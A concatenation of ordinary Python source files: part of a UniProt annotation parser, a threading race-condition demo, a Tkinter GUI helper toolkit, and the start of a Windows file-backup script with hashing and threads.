print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(MFs)) + "\t" + etype_GOMF + "\t" + NCBI_Taxid + "\n") # 'Molecular Function', -23
if CPs:
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(CPs)) + "\t" + etype_GOCC + "\t" + NCBI_Taxid + "\n") # 'Cellular Component', -22
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(CPs)) + "\t" + etype_GOCC + "\t" + NCBI_Taxid + "\n") # 'Cellular Component', -22
if BPs:
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(BPs)) + "\t" + etype_GOBP + "\t" + NCBI_Taxid + "\n") # 'Biological Process', -21
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(BPs)) + "\t" + etype_GOBP + "\t" + NCBI_Taxid + "\n") # 'Biological Process', -21
if len(InterPro) > 0:
InterPro_set = set(InterPro)
for id_ in InterPro:
InterPro_set.update(lineage_dict_interpro[id_])
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(InterPro_set)) + "\t" + etype_interpro + "\t" + NCBI_Taxid + "\n")
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(InterPro_set)) + "\t" + etype_interpro + "\t" + NCBI_Taxid + "\n")
if len(Pfam) > 0:
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(Pfam)) + "\t" + etype_pfam + "\t" + NCBI_Taxid + "\n")
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(Pfam)) + "\t" + etype_pfam + "\t" + NCBI_Taxid + "\n")
if len(Reactome) > 0:
reactome_list = Reactome.copy()
for term in reactome_list:
reactome_list += list(cst.get_parents_iterative(term, child_2_parent_dict_reactome))
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(set(reactome_list))) + "\t" + etype_reactome + "\t" + NCBI_Taxid + "\n")
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(set(reactome_list))) + "\t" + etype_reactome + "\t" + NCBI_Taxid + "\n")
# translation needed from KEGG identifier to pathway, ID vs AC can be easily distinguished via "_"
if len(KEGG) > 0:
# fh_out_UniProtID_2_ENSPs_2_KEGGs_mapping.write(UniProtID + "\t" + ";".join(STRING) + "\t" + ";".join(sorted(set(KEGG))) + "\t" + NCBI_Taxid + "\n")
print("222_UniProtID_2_ENSPs_2_KEGGs_2_Taxid " + UniProtID + "\t" + ";".join(STRING) + "\t" + ";".join(sorted(set(KEGG))) + "\t" + NCBI_Taxid + "\n")
for AC in UniProtAC_list:
# fh_out_UniProt_AC_2_ID_2_Taxid.write("{}\t{}\t{}\n".format(AC, UniProtID, NCBI_Taxid))
print("111_UniProt_AC_2_ID_2_Taxid {}\t{}\t{}\n".format(AC, UniProtID, NCBI_Taxid))
def parse_uniprot_dat_dump_yield_entry_v2_parallel(entries):
"""
UniProtKeywords
GO
InterPro
Pfam
KEGG
Reactome
    @KEGG: I have a mapping from UniProt accession (e.g. "P31946") to KEGG entry (e.g. "hsa:7529");
    what I'm missing is the mapping from KEGG entry to KEGG pathway (e.g.
hsa:7529 path:hsa04110
hsa:7529 path:hsa04114
hsa:7529 path:hsa04722)
"""
# for entry in yield_entry_UniProt_dat_dump(fn_in):
for entry in entries:
UniProtAC_list, Keywords_string, functions_2_return = [], "", []
Functions_other_list = []
UniProtID, NCBI_Taxid = "-1", "-1"
for line in entry:
try:
line_code, rest = line.split(maxsplit=1)
except ValueError:
continue
if line_code == "ID":
UniProtID = rest.split()[0]
elif line_code == "AC":
UniProtAC_list += [UniProtAN.strip() for UniProtAN in rest.split(";") if len(UniProtAN) > 0]
elif line_code == "KW":
Keywords_string += rest
elif line_code == "DR":
Functions_other_list.append(rest)
elif line_code == "OX":
# OX NCBI_TaxID=654924;
# OX NCBI_TaxID=418404 {ECO:0000313|EMBL:QAB05112.1};
if rest.startswith("NCBI_TaxID="):
NCBI_Taxid = rest.replace("NCBI_TaxID=", "").split(";")[0].split()[0]
        # UniProtAC_list = sorted(set(UniProtAC_list))
Keywords_list = [cst.cleanup_Keyword(keyword) for keyword in sorted(set(Keywords_string.split(";"))) if len(keyword) > 0] # remove empty strings from keywords_list
other_functions = cst.helper_parse_UniProt_dump_other_functions(Functions_other_list)
# GO, InterPro, Pfam, KEGG, Reactome, STRING, Proteomes
functions_2_return.append(Keywords_list)
functions_2_return += other_functions
# Keywords_list, GO, InterPro, Pfam, KEGG, Reactome, STRING, Proteomes
# GO, InterPro, Pfam, KEGG, Reactome, STRING, Proteomes
yield UniProtID, UniProtAC_list, NCBI_Taxid, functions_2_return
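# Illustrative sketch of one yielded record; the concrete values are examples only:
#
#   UniProtID          -> "1433B_HUMAN"
#   UniProtAC_list     -> ["P31946", "A8K9K2"]
#   NCBI_Taxid         -> "9606"
#   functions_2_return -> [Keywords_list, GO, InterPro, Pfam, KEGG, Reactome, STRING, Proteomes]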
if __name__ == "__main__":
Protein_2_Function_table_UniProtDump_UPS()
|
thread_queue.py
|
from threading import Thread
aLi = [0]
def func1(aLi):
for i in range(100000):
aLi[0] += 1
def func2(aLi):
for i in range(100000):
aLi[0] -= 1
t1 = Thread(target=func1, args=(aLi, ))
t2 = Thread(target=func2, args=(aLi, ))
t1.start()
t2.start()
t1.join()
t2.join()
print(aLi)
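# Note: aLi[0] += 1 / -= 1 are read-modify-write operations, so the two threads
# race and the printed result is not guaranteed to be 0. A minimal lock-protected
# sketch, assuming the same two-thread setup:
#
#   from threading import Lock
#   lock = Lock()
#   def func1(aLi):
#       for i in range(100000):
#           with lock:
#               aLi[0] += 1
#   # func2 analogously with -= 1; the final print is then always 0.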
|
tkit.py
|
# -*- coding: utf-8 -*-
"""tkit.py -- Tkinter Tool Kit
This module provides a light, object-oriented API for rapid GUI design with
Tkinter.
Author: Garin Wally; Feb 2015; Oct 2017
Specs:
all widgets should have a .name attribute
all widgets should have a .set_parent method
"""
# Imports
try:
import tkinter as tk
except ImportError:
import Tkinter as tk
import os
import re
import time
try:  # Python 3
    from tkinter import ttk, messagebox as tkMessageBox, filedialog as tkFileDialog
    from tkinter.simpledialog import askinteger, askstring, askfloat
except ImportError:  # Python 2
    import ttk
    import tkMessageBox
    import tkFileDialog
    from tkSimpleDialog import askinteger, askstring, askfloat
import threading
import logging
from collections import OrderedDict
from time import sleep
from types import MethodType
# Location of module
_DIR = os.path.dirname(__file__)
# Open folder icon
OPENFOLDER = os.path.join(_DIR, "icons/openfolder.gif").replace("\\", "/")
def NULL_ACTION(*args, **kwargs):
"""Function to replace calling None."""
pass
def _clean_name(name):
    return re.sub(r"[\W]", "", name.lower().replace(" ", "_"))
# ==============================================================================
# THREADING
def build_gui(app):
root = tk.Tk()
app(root).pack(fill='both', expand='yes')
root.mainloop()
def threaded_gui(app): # TODO: not start immediately...
gui = ThreadedClient("GUI", lambda: build_gui(app))
gui.start()
gui.join()
def thread_tasks(tasks, target=None):
"""Starts all functions in a list as threads.
Args:
tasks (list): list of functions to start as threads
target: a progress widget
"""
def delay_end(target, threads):
if target is None:
return
while any([t.is_alive() for t in threads]):
time.sleep(.2)
target.stop()
return
    threads = []
    for task in tasks:
        t = threading.Thread(target=task)
        t.daemon = True
        threads.append(t)
        t.start()
end = threading.Thread(target=delay_end, args=(target, threads))
end.start()
if target:
target.run()
return
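# Hedged usage sketch for thread_tasks (illustrative only; the exact call site is an
# assumption, not from the original module): run two callables in background threads while
# a Spinner widget (defined further down in this module) animates until both finish.
#
#   app = App("Demo")
#   spin = Spinner(app)
#   thread_tasks([lambda: time.sleep(2), lambda: time.sleep(3)], target=spin)
#   app.mainloop()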
class ThreadedClient(threading.Thread):
def __init__(self, name, process):
"""Subclass of thread allows for easier thread creation."""
threading.Thread.__init__(self)
self.name = name
self.process = process
def run(self):
"""Runs at thread start."""
logging.debug("{0} thread started".format(self.name))
self.process()
logging.debug("{0} thread terminated".format(self.name))
# ==============================================================================
# APP WINDOWS
class BaseApp(tk.Tk):
"""Basic App object."""
def __init__(self, title="", width=400, height=200):
tk.Tk.__init__(self)
# Parent window properties
self.geometry("{width}x{height}".format(width=width, height=height))
self.title(title)
self._startup()
# All child widgets should have parent/root set to the app
# Widgets objects are referenced in the widgets dict by name
self.widgets = {}
self.input_values = {}
# Custom closing procedure
self.on_close = NULL_ACTION
def _startup(self):
"""Handle window startup procedures."""
# Force to top when opened
self.attributes("-topmost", True)
self.attributes("-topmost", False)
# Activate/focus on window
self.focus_force()
# Set window close (X) handler
self.protocol("WM_DELETE_WINDOW", self.close)
def add_widget(self, widget, name=""):
"""Add a widget object to the app."""
if not name:
name = widget.name
widget.set_parent(self)
self.widgets[_clean_name(name)] = widget
return
def close(self):
"""Handle the closing of the window."""
# Close the window
self.destroy()
# End the process
self.quit()
# Do anything else
self.on_close()
def set_topmost(self, on_top=True):
"""Lock window to top."""
self.attributes("-topmost", on_top)
return
class App(BaseApp):
"""App Window."""
def __init__(self, title="", width=400, height=200):
BaseApp.__init__(self, title, width, height)
self._startup()
def add_button(self, label, action, **kwargs):
"""Adds a button."""
button = ttk.Button(self, text=label, command=action)
        button.pack(**kwargs)
name = _clean_name(label)
self.widgets[name + "_button"] = button
return
def add_text_input(self, label, length=20):
"""Adds a text box and label."""
        ttk.Label(self, text="{} ".format(label)).pack(padx=10, pady=0)
text_box = ttk.Entry(self, width=length)
text_box.pack(padx=10, pady=10)
name = _clean_name(label)
self.widgets[name + "_textbox"] = text_box
return
def cmd_collect_values(self):
"""Executes all widgets' .get() method to collect user input values."""
for name, widget in self.widgets.items():
try:
input_val = widget.get()
print(input_val)
self.input_values[name] = input_val
except (AttributeError, tk.TclError):
pass
def cmd_collect_quit(self):
"""Combines the collect values and close command."""
self.cmd_collect_values()
self.close()
return
def add_command(self, name, func):
"""Add a function as a window method; can be called by widgets."""
setattr(self, name, MethodType(func, self))
return
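'''
# Hedged usage sketch for App (illustrative only; the labels and flow below are assumptions):
# collect a text value and print it after the button closes the window.
if __name__ == "__main__":
    demo = App("Demo App")
    demo.add_text_input("Your name")
    demo.add_button("OK", demo.cmd_collect_quit)
    demo.mainloop()
    print(demo.input_values)
'''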
# TODO:
class ThreadedApp(threading.Thread, App):
"""Threaded App."""
def __init__(self, title="", width=400, height=200):
threading.Thread.__init__(self)
App.__init__(self, title, width, height)
# Parent window properties
#self.geometry("{width}x{height}".format(
# width=width, height=height))
self.title(title)
self.name = title
self._startup()
def close(self):
"""Handle the closing of the window."""
self.destroy()
self.quit()
#self.on_close()
try:
self.join()
logging.debug("{} thread terminated".format(self.name))
except RuntimeError:
pass
def run(self):
"""Threaded process called by .start() via mainloop()."""
self.protocol("WM_DELETE_WINDOW", self.close)
logging.debug("{} thread started".format(self.name))
self.main()
logging.debug("{} thread complete".format(self.name))
def mainloop_and_run(self):
"""Starts the threaded process and displays the GUI."""
self.start()
self.mainloop()
def process(self, func):
"""Wrapper/decorator for app processes."""
def wrapper(*args, **kwargs):
thread_tasks([lambda: func()], self.spinner)
#with Spinner():
# return func()
return wrapper
class Popup(BaseApp):
"""Wrapper object for tkMessageBox."""
def __init__(self, title="", message=""):
"""A popup window that is displayed using .show_ methods."""
BaseApp.__init__(self, title)
# Hide the root window
self.withdraw()
self.name = title
self.message = message
self.input = ""
def show_ok_cancel(self):
"""Display a popup with 'OK' and 'Cancel'. Returns True or False."""
self.input = tkMessageBox.askokcancel(self.name, self.message)
return
def show_yes_no(self, cancel=False):
"""Display a popup with 'Yes', 'No', and optionally 'Cancel'.
Returns True, False, or None."""
if cancel:
self.input = tkMessageBox.askyesnocancel(self.name, self.message)
return
self.input = tkMessageBox.askyesno(self.name, self.message)
return
def show_info(self):
"""Display an info popup with 'OK' button. Returns 'ok'."""
self.input = tkMessageBox.showinfo(self.name, self.message)
return
def show_warn(self):
"""Display a warning popup with 'OK' button. Returns 'ok'."""
self.input = tkMessageBox.showwarning(self.name, self.message)
return
def show_error(self):
"""Display an error popup with 'OK' button. Returns 'ok'."""
self.input = tkMessageBox.showerror(self.name, self.message)
return
def file_dialog(self, extensions=["*.*"], filetypes=["All files"]):
"""Opens file browser and returns selection as input."""
        options = dict(defaultextension=extensions[0],
                       filetypes=list(zip(filetypes, extensions)))
result = tkFileDialog.askopenfilenames(parent=self, **options)
self.input = result
return result
# =============================================================================
# MENUBAR
class Menubar(tk.Menu):
"""A menubar of menus for the top of app windows (e.g. File, Help, etc)."""
def __init__(self, parent=None):
tk.Menu.__init__(self)
self.parent = parent
self.name = "menubar"
# Set the underlying app's menu to self (this Menubar object)
try:
self.parent.config(menu=self)
except:
pass
self.menus = OrderedDict()
def set_parent(self, parent):
self.parent = parent
self.parent.config(menu=self)
return
def quit(self):
"""Alias for the parent's close() method."""
self.parent.close()
def add_menu(self, name, underline=0):
menu = Menu(self)
self.add_cascade(label=name, underline=underline, menu=menu)
self.menus[name] = menu
return
def add_action(self, menu, name, action):
"""Adds an action to a specified menu."""
self.menus[menu].add_action(name, action)
return
def add_submenu(self, menu, name):
"""Adds an action to a specified menu."""
self.menus[menu].add_submenu(name)
return
class Menu(tk.Menu):
"""A menu object to place in the menubar."""
def __init__(self, parent):
tk.Menu.__init__(self, parent, tearoff=False)
self.items = OrderedDict()
def add_action(self, name, action):
"""Adds an action to the current menu."""
if not action:
action = NULL_ACTION
# Handle new apps as actions
if hasattr(action, "mainloop"):
action = action.mainloop
self.items.update({name: action})
self.add_command(label=name, command=action)
return
def add_submenu(self, name, underline=0):
"""Adds an action to the current menu."""
menu = Menu(self)
self.add_cascade(label=name, underline=underline, menu=menu)
self.items[name] = menu
return
# =============================================================================
# ENTRYBOX
class StatusBar(ttk.Frame):
def __init__(self, root, left="", left_alt="",
right="Ready.", right_alt="Working...",
relief="sunken"):
"""Frame at bottom of root with labels at left and right."""
self.root = root
self.left = left
self.left_alt = left_alt
self.right = right
self.right_alt = right_alt
ttk.Frame.__init__(self, root, relief=relief)
# Place frame into root (at bottom)
self.pack(side='bottom', anchor='s', fill='x',
expand='yes', padx=1, pady=1)
# Place left label
self.left_label = ttk.Label(self, text=self.left)
self.left_label.pack(side="left", anchor="sw", padx=2, pady=2)
# Place right label
self.right_label = ttk.Label(self, text=self.right)
self.right_label.pack(side="right", anchor="sw", padx=2, pady=2)
def reset(self):
self.left_label.config(text=self.left)
self.right_label.config(text=self.right)
self.root.update()
return
def process(self, func):
def wrapper(*args, **kwargs):
with self:
return func(*args, **kwargs)
return wrapper
def __enter__(self):
self.left_label.config(text=self.left_alt)
self.right_label.config(text=self.right_alt)
self.root.update()
def __exit__(self, exc_type, exc_val, exc_tb):
self.reset()
# =============================================================================
# ENTRYBOX
class EntryBox(ttk.LabelFrame):
def __init__(self, root, label, button_label, button_action, # TODO: size
default_text="", clear_text=True, relief="ridge"):
"""Entry and action button in LabelFrame.
Args:
root: parent app object
label (str): text to display on LabelFrame
button_label (str): text to display on Button
button_action (func): function that does something with input str
default_text (str): text to show in Entry
clear_text (bool): clear the box after button action (default True)
relief (str): LabelFrame's relief type
"""
ttk.LabelFrame.__init__(self, root, relief=relief, text=label)
self.button_action = button_action
self.root = root
self.button_label = button_label
self.clear_text = clear_text
self.button = ttk.Button(self, text=self.button_label,
width=len(self.button_label)+1)
#self.set_command(self.cmd)
self.button.pack(side="right", anchor="sw", padx=2, pady=4)
self.entry = ttk.Entry(self)
self.entry.pack(side="left", anchor="s", fill="x", expand="yes",
padx=2, pady=4)
self.entry.insert(0, default_text)
# Set action
self.button.config(command=self.__call__)
self.pack()
def get_value(self):
return self.entry.get()
# TODO: does this work well?
def __call__(self):
result = self.button_action(self.get_value())
self.clear()
return result
#def set_command(self, func):
# #self.button.config(command=lambda: func(self.get_value()))
# self.button.config(command=self.cmd)
# return
def clear(self):
self.entry.delete(0, 9999999)
return
# =============================================================================
# STATUSBAR
'''
class Statusbar(tk.Frame):
"""Places status bar and label in frame."""
def __init__(self, root, disable_button=None):
tk.Frame.__init__(self, root)
self.root = root
self.status_thread = ThreadedClient("Statusbar", self.start_bar)
self.wait_event = threading.Event()
self.root_but = disable_button
# Status (label)
self.labels = ["Ready", "Working...", "Done"]
self.cur_status = 0
# Statusbar container
self.bar = ttk.Frame(root, relief='raised')
self.bar.pack(side='bottom', anchor='s', fill='x',
expand='yes', padx=0, pady=0)
# Status labels
self.status_label = ttk.Label(self.bar, text=self.labels[0])
self.status_label.pack(side='left', anchor='sw', padx=2, pady=5)
# Progress bar
self.progressbar = ttk.Progressbar(self.bar, orient='horizontal',
length=200, mode='indeterminate')
# Reset button
self.reset_but = tk.Button(self.bar, text="Reset", command=self.reset)
self.reset_but.config(relief='flat',
overrelief="groove",
height=0)
def reset(self):
"""Resets the status bar."""
self.root_but.config(state="enabled")
self.progressbar.pack_forget()
self.update_bar()
self.status_thread = ThreadedClient("Statusbar", self.start_bar)
self.wait_event = threading.Event()
self.reset_but.pack_forget()
def update_bar(self):
"""Changes status label and packs/unpacks progress bar."""
self.cur_status += 1
if self.cur_status > 2:
self.cur_status = 0
self.status_label.config(text=self.labels[self.cur_status])
if self.cur_status == 1:
self.progressbar.pack(side='right', expand='y',
fill='x', padx=5, pady=2)
elif self.cur_status == 2:
self.reset_but.pack(side='right')
# self.progressbar.pack_forget() # Issue here
def start_bar(self):
"""Controls the bar."""
self.root_but.config(state='disabled')
self.progressbar.start(1)
self.wait_event.wait()
logging.debug("Status wait event done")
self.progressbar.stop()
logging.debug("Bar stopped")
def start(self):
"""Starts the status thread."""
self.update_bar()
self.status_thread.start()
def stop(self):
"""Stops the bar at the event flag."""
self.wait_event.set()
self.update_bar()
'''
'''
class _App(tk.Frame):
"""Testing GUI"""
def __init__(self, root):
# Parent window properties
tk.Frame.__init__(self, root)
self.root = root
self.root.title("Statusbar Testing App")
self.root.geometry('160x100')
""" Testing Variables """
self.Main_val = 5
""" Widgets """
# OK Button runs Main() and sends parameters (from tk widgets)
self.Ok_but = ttk.Button(text=" OK ",
command=self.call_main)
self.Ok_but.pack()
# Imported StatusBar will be used as so
self.statusbar = Statusbar(self, self.Ok_but)
""" Bindings """
# Allows user to press "Enter" instead of clicking the OK button
self.root.bind('<Return>', self.call_main)
# Allows user to press "Escape" instead of clicking the Close button
self.root.bind('<Escape>', self.close)
""" Window Methods """
def close(self, event=None):
self.root.destroy()
""" Main Method(s) """
def call_main(self, event=None):
"""Threadifies Main() and passes parameters to it."""
self.main_thread = apptools.ThreadedClient(
"Main", lambda: self.Main(self.Main_val))
self.main_thread.start()
def Main(self, t):
"""Emulates process."""
logging.debug('Processing...')
self.statusbar.start()
sleep(t)
logging.debug('Processing Complete')
self.statusbar.stop() # Should also hide/pack_forget the prog bar
'''
'''
if __name__ == '__main__':
apptools.thread_GUI(_App)
'''
# =============================================================================
# RADIOBOX
class Radiobox(ttk.LabelFrame):
"""Allows user to easily place radio buttions into a labelframe."""
def __init__(self, root, var_type, labelframe_text, box_side,
box_anchor, box_fill, box_expand, r_alignment='horizontal'):
# Container
self.Container = ttk.LabelFrame(root, text=labelframe_text)
self.Container.pack(fill=box_fill, expand=box_expand, side=box_side,
anchor=box_anchor, padx=5, pady=5)
# Default radiobutton value
if var_type == "string" or var_type == "str":
self.radio_value = tk.StringVar()
else:
self.radio_value = tk.IntVar()
# Alignment method for radio buttons ('horizontal' or 'vertical')
# What if the user wants a grid of radio buttons?
# N x N or max_row / max_col?
# alignment_methods = {0: 'horizontal', 1: 'vertical'}
self.button_alignment = r_alignment
self.r_column = 0
self.r_row = 0
def add_button(self, radio_name, in_value):
"""Adds a new button to the radiobox."""
rbutton = ttk.Radiobutton(self.Container, text=radio_name,
value=in_value, variable=self.radio_value)
rbutton.grid(column=self.r_column, row=self.r_row)
if self.button_alignment == 'horizontal':
self.r_column += 1
else:
self.r_row += 1
def get(self):
"""Returns the value of the selected radiobutton."""
return self.radio_value.get()
def _print_selected(self):
"""For Testing"""
        print(self.radio_value.get())
'''
class _App(tk.Frame):
"""Testing GUI"""
def __init__(self, root):
""" Parent window properties """
tk.Frame.__init__(self, root)
self.root = root
self.root.title("Radiobox Test App")
""" Widgets """
self.radiobox = Radiobox(self, 'str', " Radios ", 'top',
'nw', 'both', 'yes', 1)
self.radiobox.add_button('Option 1', 'One')
self.radiobox.add_button('Option 2', 'Two')
self.radiobox.add_button('Option 3', 'Three')
self.Ok_but = ttk.Button(text=" Print ",
command=self.radiobox._print_selected)
self.Ok_but.pack(side='bottom')
'''
'''
if __name__ == '__main__':
apptools.thread_GUI(_App)
'''
# =============================================================================
# FILETREE
class FileTree(ttk.LabelFrame): # TODO: Consider "ListTree" as name
"""Allows user to easily manipulate columns of data."""
def __init__(self, root):
self.root = root
# Vars
self.fileList = []
# Container
self.container = ttk.LabelFrame(root, text=' Tabel Label ')
self.container.pack(side='top', anchor='n', fill='x',
expand='yes', padx=5, pady=5)
self.headers = "Col 1"
# Tree
self.tree = ttk.Treeview(self.container, show="headings", height=5)
self.tree["columns"] = "single"
self.tree.column("single", width=200)
self.tree.heading("single", text="Input Files")
self.tree.pack(fill='x')
# Duplicate Warning
self.warning = ttk.Label(self.container,
text="Warning:\nDuplicates will be removed")
# Add button - adds table contents
self.Add_but = ttk.Button(self.container, text='Add',
command=self.add_file)
self.Add_but.pack(side='left')
# Remove button - removes selected table contents
self.Remove_but = ttk.Button(self.container, text='Remove',
command=self.rm_file)
self.Remove_but.pack(side='right')
# Default filetypes
self.FILEOPENOPTIONS = dict(defaultextension='*.*',
filetypes=[('All files', '*.*')])
def set_filetypes(self, default_ext, types_tupelist):
self.FILEOPENOPTIONS = None
self.FILEOPENOPTIONS = dict(defaultextension=default_ext,
filetypes=types_tupelist)
def add_file(self):
"""Opens file browser and places selected file(s) in tree."""
new_file = tkFileDialog.askopenfilenames(parent=self.root,
**self.FILEOPENOPTIONS)
print(new_file)
for f in new_file:
self.fileList.append(f)
self.tree.insert("", 'end', values=f)
if len(self.fileList) != len(set(self.fileList)):
self.warning.pack(side='bottom')
def rm_file(self):
"""Removes selected file from tree."""
current_val = self.tree.item(self.tree.focus())['values'][0]
self.tree.delete(self.tree.focus())
self.fileList.remove(current_val)
# Attempts to remove duplicate warning
if len(self.fileList) == len(set(self.fileList)):
self.warning.pack_forget()
def get_list(self):
"""Returns selected list of selected files."""
self.fileList = list(set(self.fileList))
print(self.fileList)
return self.fileList
'''
class _App(tk.Frame):
"""Testing GUI"""
def __init__(self, root):
tk.Frame.__init__(self, root)
self.filetree = FileTree(self)
self.Ok_but = ttk.Button(text=" Pass ",
command=self.filetree.get_list)
self.Ok_but.pack(side='bottom')
'''
'''
if __name__ == '__main__':
apptools.thread_GUI(_App)
'''
# =============================================================================
# BROWSEFILE
class BrowseFile(ttk.LabelFrame):
"""Select a file(s) and add it to an entrybox"""
def __init__(self, root=None):
self.root = root
self.name = "browsefile"
# Input Frame
self.Container = ttk.LabelFrame(root, text=" Select File ")
self.Container.pack(side='top', anchor='n', fill='x',
expand='yes', padx=5, pady=5)
# Default filetypes
self.FILEOPENOPTIONS = dict(defaultextension='*.*',
filetypes=[('All files', '*.*')])
# Browse Entry
self.fileVar = tk.StringVar()
self.fileEntry = ttk.Entry(self.Container, width=30)
self.fileEntry.pack(side='left', anchor='nw', fill='x',
expand='yes', padx=5, pady=5)
# TODO: Copy/paste
# Browse Button
try:
# Use the folder icon
self.opengif = tk.PhotoImage(file=OPENFOLDER)
self.browseBut = ttk.Button(self.Container,
command=self._browse)
self.browseBut.config(image=self.opengif)
except:
            # Fall back to an ellipsis label
self.browseBut = ttk.Button(self.Container,
text=" ... ",
command=self._browse)
self.browseBut.pack(side='right', anchor='ne',
padx=5, pady=5)
def set_parent(self, parent):
self.root = parent
def set_filetypes(self, default_ext, types_tupelist):
self.FILEOPENOPTIONS = None
self.FILEOPENOPTIONS = dict(defaultextension=default_ext,
filetypes=types_tupelist)
def _browse(self):
"""Opens file browser and places selected file in entry."""
browse_file = tkFileDialog.askopenfilenames(
parent=self.root, **self.FILEOPENOPTIONS)
# Place in entry box
# TODO: parent_dir = path.dirname(browse_file)
self.fileEntry.delete(0, 'end')
self.fileEntry.insert(0, browse_file)
self.fileVar.set(browse_file)
# TODO: return browse_file, parent_dir
def get(self):
return self.fileVar.get()
class BrowseDir(ttk.LabelFrame):
"""Select a directory and add it to an entrybox."""
def __init__(self, root):
self.root = root
# Input Frame
self.Container = ttk.LabelFrame(root,
text=" Select Directory ")
self.Container.pack(side='top', anchor='n', fill='x',
expand='yes', padx=5, pady=5)
# Browse Entry
self.fileVar = tk.StringVar()
self.fileEntry = ttk.Entry(self.Container, width=30)
self.fileEntry.pack(side='left', anchor='nw', fill='x',
expand='yes', padx=5, pady=5)
# Browse Button
try:
# Use the folder icon
self.opengif = tk.PhotoImage(file=OPENFOLDER)
self.browseBut = ttk.Button(self.Container, command=self._browse)
self.browseBut.config(image=self.opengif)
except:
            # Fall back to an ellipsis label
self.browseBut = ttk.Button(self.Container, text=" ... ",
command=self._browse)
self.browseBut.pack(side='right', anchor='ne', padx=5, pady=5)
def _browse(self):
"""Opens file browser and places selected dir in entry."""
browse_file = tkFileDialog.askdirectory(parent=self.root)
self.fileEntry.delete(0, 'end')
self.fileEntry.insert(0, browse_file)
self.fileVar.set(browse_file)
def get(self):
return self.fileVar.get()
'''
class _App(tk.Frame):
"""Testing GUI"""
def __init__(self, root):
tk.Frame.__init__(self, root)
self.browse_ent = BrowseFile(self)
self.browse_ent.set_filetypes('.py',
[('Python', '.pyw'),
('Python', '.py')])
self.browse_dir = BrowseDir(self)
'''
'''
if __name__ == '__main__':
apptools.thread_GUI(_App)
'''
# =============================================================================
# PROGRESSES
# TODO: move to own package with statusbar -- renamed to progressbar
# TODO: create new status bar object from frame
import itertools
#class _Progress(threading.Thread, tk.Label):
class _Progress(tk.Label):
def __init__(self, root, speed=.25, side="right",
anchor="se", padx=2, pady=2):
tk.Label.__init__(self, root, text="")
self.speed = speed
self.side = side
self.anchor = anchor
self.padx = padx
self.pady = pady
self.cycle = []
self._stop = threading.Event()
setattr(root, "spinner", self)
#try:
# root.add_command("start_spinner", self.run)
# root.add_command("stop_spinner", self.run)
#except AttributeError:
# root.root.add_command("start_spinner", self.run)
# root.root.add_command("stop_spinner", self.run)
def run(self, event=None, tasks=[]):
"""Executes the progress bar as a thread."""
#self._stop.clear()
self.pack(side=self.side, anchor=self.anchor,
padx=self.padx, pady=self.pady)
while not self._stop.is_set():
            self.config(text=next(self.cycle))
self.update()
time.sleep(self.speed)
self.pack_forget()
def stop(self, event=None):
"""Stops the progress bar."""
time.sleep(1)
self._stop.set()
return
'''
def __enter__(self):
print("Spinner Started.")
self.run()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
print("Spinner Stopped.")
'''
class Spinner(_Progress):
def __init__(self, root, side="right", anchor="se", padx=2, pady=2):
_Progress.__init__(self, root)
#self.pack(side=side, anchor=anchor, padx=padx, pady=pady)
self.cycle = itertools.cycle(["|", "/", "--", "\\"])
class Bouncer(_Progress):
def __init__(self, root, side="right", anchor="se", padx=2, pady=2):
_Progress.__init__(self, root)
#self.pack(side=side, anchor=anchor, padx=padx, pady=pady)
self.cycle = itertools.cycle(
["[* ]", "[ * ]", "[ * ]", "[ * ]",
"[ *]", "[ * ]", "[ * ]", "[ * ]"])
class Elipse(_Progress):
def __init__(self, root, word="", side="right",
anchor="se", padx=2, pady=2):
_Progress.__init__(self, root)
#self.pack(side=side, anchor=anchor, padx=padx, pady=pady)
elipses = [" ", ". ", ".. ", "..."]
self.cycle = itertools.cycle(
["[{}{}]".format(word, e) for e in elipses])
'''
app = ThreadedApp("Spinner")
#spinner = Spinner(app)
spinner = Bouncer(app)
#spinner = Elipse(app, word="")
app.add_command("stop_spinner", spinner.stop)
app.add_command("start_spinner", spinner.run)
app.add_button("Start", app.start_spinner)
app.add_button("Stop", app.stop_spinner)
app.mainloop()
'''
if __name__ == "__main__":
# Logging output
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s')
# Sources:
# https://stackoverflow.com/questions/4297949/image-on-a-button
# https://stackoverflow.com/questions/11352278/default-file-type-in-tkfiledialogs-askopenfilename-method
|
backup.py
|
import hashlib
import csv
import os
from datetime import date
import shutil
import glob
import win32api
import win32con
import win32file
import sys
import yaml
import argparse
import subprocess
import time
import threading
import queue
import typing
import pywintypes
import zipfile
class FileInfo:
def __init__(self, path=None, hash_val=None, stat_info=None, csv_row=None):
if csv_row:
self.path = csv_row[0]
self.hash_val = csv_row[1]
self.size = int(csv_row[2])
self.mtime_ns = int(csv_row[3])
self.ctime_ns = int(csv_row[4])
else:
if path and hash_val and stat_info:
self.path = path
self.hash_val = hash_val
self.size = stat_info.st_size
self.mtime_ns = stat_info.st_mtime_ns
self.ctime_ns = stat_info.st_ctime_ns
else:
raise ValueError
def make_csv_row(self):
return [self.path, self.hash_val, self.size, self.mtime_ns, self.ctime_ns]
def has_stat_changed(self, stat_info):
return (self.size != stat_info.st_size or
self.mtime_ns != stat_info.st_mtime_ns or
self.ctime_ns != stat_info.st_ctime_ns)
log_lock = threading.Lock()
def log_msg(*args):
with log_lock:
print(time.strftime('%H:%M:%S '), threading.get_ident(), ' ', *args, flush=True)
def hash_file(file_path):
""" return hash of given file"""
alg = hashlib.sha1()
f = open(file_path, 'rb')
size = 16 * 1024 * 1024
buf = f.read(size)
while len(buf) > 0:
alg.update(buf)
buf = f.read(size)
f.close()
return alg.hexdigest()
def run_threaded(func, args):
thread_count = 16
threads = []
for i in range(thread_count):
thread = (threading.Thread(target=func, args=args))
threads.append(thread)
thread.start()
    # If the first argument is a work queue, periodically log its size while the threads run.
